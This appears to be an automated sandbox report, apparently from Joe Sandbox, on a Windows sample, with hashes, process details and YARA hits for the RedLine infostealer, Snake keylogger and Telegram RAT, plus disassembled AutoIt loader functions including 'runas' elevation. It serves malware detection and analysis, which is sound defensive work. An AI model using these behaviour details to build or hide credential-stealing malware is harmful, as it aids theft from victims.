Path:	C:\Users\user\Desktop\vnV17JImCH.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\vnV17JImCH.exe"
Imagebase:	0xea0000
File size:	80'740'352 bytes
MD5 hash:	01F9C9F129A9DE9D594ADDB7C32D194D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000000.00000002.2361531765.0000000002530000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	17:40:55
Start date:	10/01/2025
Path:	C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\vnV17JImCH.exe"
Imagebase:	0xee0000
File size:	46'504 bytes
MD5 hash:	1ED18311E3DA35942DB37D15FA40CC5B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000002.00000002.4802248742.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.4807310402.0000000007BE0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000002.00000002.4807310402.0000000007BE0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000002.00000002.4807310402.0000000007BE0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000002.4807310402.0000000007BE0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.4807032364.0000000007B40000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000002.00000002.4807032364.0000000007B40000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000002.00000002.4807032364.0000000007B40000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000002.4807032364.0000000007B40000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000002.00000002.4807032364.0000000007B40000.00000004.08000000.00040000.00000000.sdmp, Author: unknown Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000002.00000002.4807032364.0000000007B40000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000002.00000002.4807032364.0000000007B40000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.4805427544.0000000006303000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000002.00000002.4807310402.0000000007BE0000.00000004.08000000.00040000.00000000.sdmp, Author: unknown Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000002.00000002.4807310402.0000000007BE0000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000002.00000002.4807310402.0000000007BE0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.2357967524.000000000326E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000002.00000003.2357967524.000000000326E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000002.00000003.2357967524.000000000326E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000003.2357967524.000000000326E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000002.00000003.2357967524.000000000326E000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000002.00000003.2357967524.000000000326E000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000002.00000003.2357967524.000000000326E000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.4803380705.0000000003374000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000002.00000002.4803380705.0000000003374000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000002.4803380705.0000000003374000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000002.00000002.4803380705.0000000003374000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.4804087692.0000000005383000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000002.00000002.4804087692.0000000005281000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	3.7%
Dynamic/Decrypted Code Coverage:	1.5%
Signature Coverage:	4.8%
Total number of Nodes:	2000
Total number of Limit Nodes:	45

Executed Functions

Function 00EA3B3A Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 153
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00EA3B68
IsDebuggerPresent.KERNEL32 ref: 00EA3B7A
GetFullPathNameW.KERNEL32(00007FFF,?,?,00F652F8,00F652E0,?,?), ref: 00EA3BEB

Part of subcall function 00EA7BCC: _memmove.LIBCMT ref: 00EA7C06

Part of subcall function 00EB092D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00EA3C14,00F652F8,?,?,?), ref: 00EB096E

SetCurrentDirectoryW.KERNEL32(?), ref: 00EA3C6F
MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,00F57770,00000010), ref: 00EDD281
SetCurrentDirectoryW.KERNEL32(?,00F652F8,?,?,?), ref: 00EDD2B9
GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00F54260,00F652F8,?,?,?), ref: 00EDD33F
ShellExecuteW.SHELL32(00000000,?,?), ref: 00EDD346

Part of subcall function 00EA3A46: GetSysColorBrush.USER32(0000000F), ref: 00EA3A50
Part of subcall function 00EA3A46: LoadCursorW.USER32(00000000,00007F00), ref: 00EA3A5F
Part of subcall function 00EA3A46: LoadIconW.USER32(00000063), ref: 00EA3A76
Part of subcall function 00EA3A46: LoadIconW.USER32(000000A4), ref: 00EA3A88
Part of subcall function 00EA3A46: LoadIconW.USER32(000000A2), ref: 00EA3A9A
Part of subcall function 00EA3A46: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00EA3AC0
Part of subcall function 00EA3A46: RegisterClassExW.USER32(?), ref: 00EA3B16

Part of subcall function 00EA39D5: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00EA3A03
Part of subcall function 00EA39D5: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00EA3A24
Part of subcall function 00EA39D5: ShowWindow.USER32(00000000,?,?), ref: 00EA3A38
Part of subcall function 00EA39D5: ShowWindow.USER32(00000000,?,?), ref: 00EA3A41

Part of subcall function 00EA434A: _memset.LIBCMT ref: 00EA4370
Part of subcall function 00EA434A: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00EA4415

Strings

runas, xrefs: 00EDD33A
This is a third-party compiled AutoIt script., xrefs: 00EDD279

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
String ID: This is a third-party compiled AutoIt script.$runas
API String ID: 529118366-3287110873
Opcode ID: 9e564bed3ed09f44d86d60fb521c8a1d80786a1ec420d8251294e5b8aee4193c
Instruction ID: 92971cc8413d9055661a2630858a152681637ea2618a38941bce3cd0e1a5ef72
Opcode Fuzzy Hash: 9e564bed3ed09f44d86d60fb521c8a1d80786a1ec420d8251294e5b8aee4193c
Instruction Fuzzy Hash: 2051FB7090810CAEDF11EBB4EC15DED7BB9AF4EB14F005165F461BB1A2CAB06646EB31

Function 00EA49A0 Relevance: 10.7, APIs: 7, Instructions: 223
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32(?), ref: 00EA49CD

Part of subcall function 00EA7BCC: _memmove.LIBCMT ref: 00EA7C06

GetCurrentProcess.KERNEL32(?,00F2FAEC,00000000,00000000,?), ref: 00EA4A9A
IsWow64Process.KERNEL32(00000000), ref: 00EA4AA1
GetNativeSystemInfo.KERNELBASE(00000000), ref: 00EA4AE7
FreeLibrary.KERNEL32(00000000), ref: 00EA4AF2
GetSystemInfo.KERNEL32(00000000), ref: 00EA4B23
GetSystemInfo.KERNEL32(00000000), ref: 00EA4B2F

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
String ID:
API String ID: 1986165174-0
Opcode ID: a348421052d1c2a25104be784f3cd77eaca4876e7bc658b70c275881d1617d3d
Instruction ID: b3fb14d72e3d923885f580f0c8b47dbc8e1b47c7297e0da3ca89041d9f1f330e
Opcode Fuzzy Hash: a348421052d1c2a25104be784f3cd77eaca4876e7bc658b70c275881d1617d3d
Instruction Fuzzy Hash: 3291F47198D7C0DEC731CB6888501AABFF5AF6E304F4459AED0C7A7B42E260B508D769

Function 00EA4E89 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,00EA4D8E,?,?,00000000,00000000), ref: 00EA4E99
FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00EA4D8E,?,?,00000000,00000000), ref: 00EA4EB0
LoadResource.KERNEL32(?,00000000,?,?,00EA4D8E,?,?,00000000,00000000,?,?,?,?,?,?,00EA4E2F), ref: 00EDD937
SizeofResource.KERNEL32(?,00000000,?,?,00EA4D8E,?,?,00000000,00000000,?,?,?,?,?,?,00EA4E2F), ref: 00EDD94C
LockResource.KERNEL32(00EA4D8E,?,?,00EA4D8E,?,?,00000000,00000000,?,?,?,?,?,?,00EA4E2F,00000000), ref: 00EDD95F

Strings

SCRIPT, xrefs: 00EA4EA6

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: Resource$CreateFindGlobalLoadLockSizeofStream
String ID: SCRIPT
API String ID: 3051347437-3967369404
Opcode ID: 400e76808c446af013bbb50436344f6871cf19ac97bcabb75980113d0d623d1e
Instruction ID: 10f6cb712631ce56eae8f4d3fad926c687ae6daa9f2fb09ead1aea661a9c017c
Opcode Fuzzy Hash: 400e76808c446af013bbb50436344f6871cf19ac97bcabb75980113d0d623d1e
Instruction Fuzzy Hash: 07115EB5240704BFD7218B65EC48F677BBAFBCAB11F108278F4059A290DBA1EC059A60

Function 00F0445A Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,00EDE398), ref: 00F0446A
FindFirstFileW.KERNELBASE(?,?), ref: 00F0447B
FindClose.KERNEL32(00000000), ref: 00F0448B

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: FileFind$AttributesCloseFirst
String ID:
API String ID: 48322524-0
Opcode ID: eaa8e83284a2a08c66745688c1ddc8f0204e2218796f21b1e14db52d2da7168f
Instruction ID: 9c04ee1481e23a16af67f330edefa11e0b1d0f0694e745d633c9318147579b59
Opcode Fuzzy Hash: eaa8e83284a2a08c66745688c1ddc8f0204e2218796f21b1e14db52d2da7168f
Instruction Fuzzy Hash: CFE0D877820504A78220EB38EC0D4E9776C9E06335F10072AFD35C10D0E7746D04B595

Function 00EB09D0 Relevance: 57.3, APIs: 27, Strings: 5, Instructions: 1300windowsleeptimeCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00EB0A5B
timeGetTime.WINMM ref: 00EB0D16
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00EB0E53
Sleep.KERNEL32(0000000A), ref: 00EB0E61
LockWindowUpdate.USER32(00000000,?,?), ref: 00EB0EFA
DestroyWindow.USER32 ref: 00EB0F06
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00EB0F20
Sleep.KERNEL32(0000000A,?,?), ref: 00EE4E83
TranslateMessage.USER32(?), ref: 00EE5C60
DispatchMessageW.USER32(?), ref: 00EE5C6E
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00EE5C82

Strings

@COM_EVENTOBJ, xrefs: 00EE54F0
@TRAY_ID, xrefs: 00EE578F
@GUI_WINHANDLE, xrefs: 00EE4F8F
@GUI_CTRLID, xrefs: 00EE4F3A
@GUI_CTRLHANDLE, xrefs: 00EE4FE4

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: Message$PeekSleepWindow$DestroyDispatchLockTimeTranslateUpdatetime
String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
API String ID: 4212290369-3242690629
Opcode ID: 66cea591a27e1dfa01b853eb0e1572d970a5e94d347074c97b327ce5ec96ed06
Instruction ID: 6836c5c82c3ebcc48f69b959f0c26483258c60800fc10b8019e284ffc513b0da
Opcode Fuzzy Hash: 66cea591a27e1dfa01b853eb0e1572d970a5e94d347074c97b327ce5ec96ed06
Instruction Fuzzy Hash: F8B2E271608785DFD724DF24C884BABB7E4BF85308F14591DE59ABB2A1CB70E844DB82

Function 00F09155 Relevance: 19.8, APIs: 13, Instructions: 322
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00F08F5F: __time64.LIBCMT ref: 00F08F69

Part of subcall function 00EA4EE5: _fseek.LIBCMT ref: 00EA4EFD

__wsplitpath.LIBCMT ref: 00F09234

Part of subcall function 00EC40FB: __wsplitpath_helper.LIBCMT ref: 00EC413B

_wcscpy.LIBCMT ref: 00F09247
_wcscat.LIBCMT ref: 00F0925A
__wsplitpath.LIBCMT ref: 00F0927F
_wcscat.LIBCMT ref: 00F09295
_wcscat.LIBCMT ref: 00F092A8

Part of subcall function 00F08FA5: _memmove.LIBCMT ref: 00F08FDE
Part of subcall function 00F08FA5: _memmove.LIBCMT ref: 00F08FED

_wcscmp.LIBCMT ref: 00F091EF

Part of subcall function 00F09734: _wcscmp.LIBCMT ref: 00F09824
Part of subcall function 00F09734: _wcscmp.LIBCMT ref: 00F09837

DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00F09452
_wcsncpy.LIBCMT ref: 00F094C5
DeleteFileW.KERNEL32(?,?), ref: 00F094FB
CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00F09511
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00F09522
DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00F09534

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
String ID:
API String ID: 1500180987-0
Opcode ID: 66851d8bcf1576c258c6f0fb13eadf04b97ecc82b66bf3251b706d91238bea89
Instruction ID: 57f9cd02b4a7a2dd2f90a32791f67e692c5eec89ae36b6fdb28c1911d2865ce1
Opcode Fuzzy Hash: 66851d8bcf1576c258c6f0fb13eadf04b97ecc82b66bf3251b706d91238bea89
Instruction Fuzzy Hash: 52C16FB1D04219AEDF21DF95CC81EDEB7BDEF85310F0040AAF609E6191EB709A459F61

Function 00EA3015 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 73
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00EA3074
RegisterClassExW.USER32(00000030), ref: 00EA309E
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00EA30AF
InitCommonControlsEx.COMCTL32(?), ref: 00EA30CC
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00EA30DC
LoadIconW.USER32(000000A9), ref: 00EA30F2
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00EA3101

Strings

TaskbarCreated, xrefs: 00EA30A4
AutoIt v3 GUI, xrefs: 00EA3090
+, xrefs: 00EA305D
0, xrefs: 00EA3056

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: be40aad465a5f52e602a1c470411b0e6180620b7c105d47c93abb594d27d4064
Instruction ID: c08a46a4d3d0f4271cb2eed42767189e4e15199bef02fd4987be7acde8628fa6
Opcode Fuzzy Hash: be40aad465a5f52e602a1c470411b0e6180620b7c105d47c93abb594d27d4064
Instruction Fuzzy Hash: E9315871851309EFDB10CFA4E888A8DBBF0FB09710F14456EE590E62A0D3B9458AEF51

Function 00EA3041 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00EA3074
RegisterClassExW.USER32(00000030), ref: 00EA309E
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00EA30AF
InitCommonControlsEx.COMCTL32(?), ref: 00EA30CC
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00EA30DC
LoadIconW.USER32(000000A9), ref: 00EA30F2
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00EA3101

Strings

TaskbarCreated, xrefs: 00EA30A4
AutoIt v3 GUI, xrefs: 00EA3090
+, xrefs: 00EA305D
0, xrefs: 00EA3056

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: 79b1e9c533a6f0a6ddb996dbfc2fd7dd2b0a50fcfb07eff43f5dcbe614cc9537
Instruction ID: 78cef14537c871edccf4b335af3e38d9a625996ac6d49b45bc28859e0fdf5816
Opcode Fuzzy Hash: 79b1e9c533a6f0a6ddb996dbfc2fd7dd2b0a50fcfb07eff43f5dcbe614cc9537
Instruction Fuzzy Hash: 4B21C5B1D2121CAFDB10DFA4ED49B9DBBF4FB08B00F00412AF521A72A0D7B54549AF95

Function 00EA708B Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00EA4706: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00F652F8,?,00EA37AE,?), ref: 00EA4724

Part of subcall function 00EC050B: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00EA7165), ref: 00EC052D

RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00EA71A8
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00EDE8C8
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00EDE909
RegCloseKey.ADVAPI32(?), ref: 00EDE947
_wcscat.LIBCMT ref: 00EDE9A0

Strings

Include, xrefs: 00EDE8BF, 00EDE900
\Include\, xrefs: 00EA7165
\, xrefs: 00EDE9C3
Software\AutoIt v3\AutoIt, xrefs: 00EA719E

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
API String ID: 2673923337-2727554177
Opcode ID: b2bb80378eaaa5e65ec733585c7ec948d9991de997cb8f7299a0332f44052a8d
Instruction ID: 40f5ed53b7effbb6e9e52ec037aabb9ed2aabe71d64874b0c91b85bc3ccbd420
Opcode Fuzzy Hash: b2bb80378eaaa5e65ec733585c7ec948d9991de997cb8f7299a0332f44052a8d
Instruction Fuzzy Hash: F371D1714083059EC700EF25EC6199BBBF8FF89310F40152EF495EB2A1DBB1A949DB92

Function 00EA3A46 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00EA3A50
LoadCursorW.USER32(00000000,00007F00), ref: 00EA3A5F
LoadIconW.USER32(00000063), ref: 00EA3A76
LoadIconW.USER32(000000A4), ref: 00EA3A88
LoadIconW.USER32(000000A2), ref: 00EA3A9A
LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00EA3AC0
RegisterClassExW.USER32(?), ref: 00EA3B16

Part of subcall function 00EA3041: GetSysColorBrush.USER32(0000000F), ref: 00EA3074
Part of subcall function 00EA3041: RegisterClassExW.USER32(00000030), ref: 00EA309E
Part of subcall function 00EA3041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00EA30AF
Part of subcall function 00EA3041: InitCommonControlsEx.COMCTL32(?), ref: 00EA30CC
Part of subcall function 00EA3041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00EA30DC
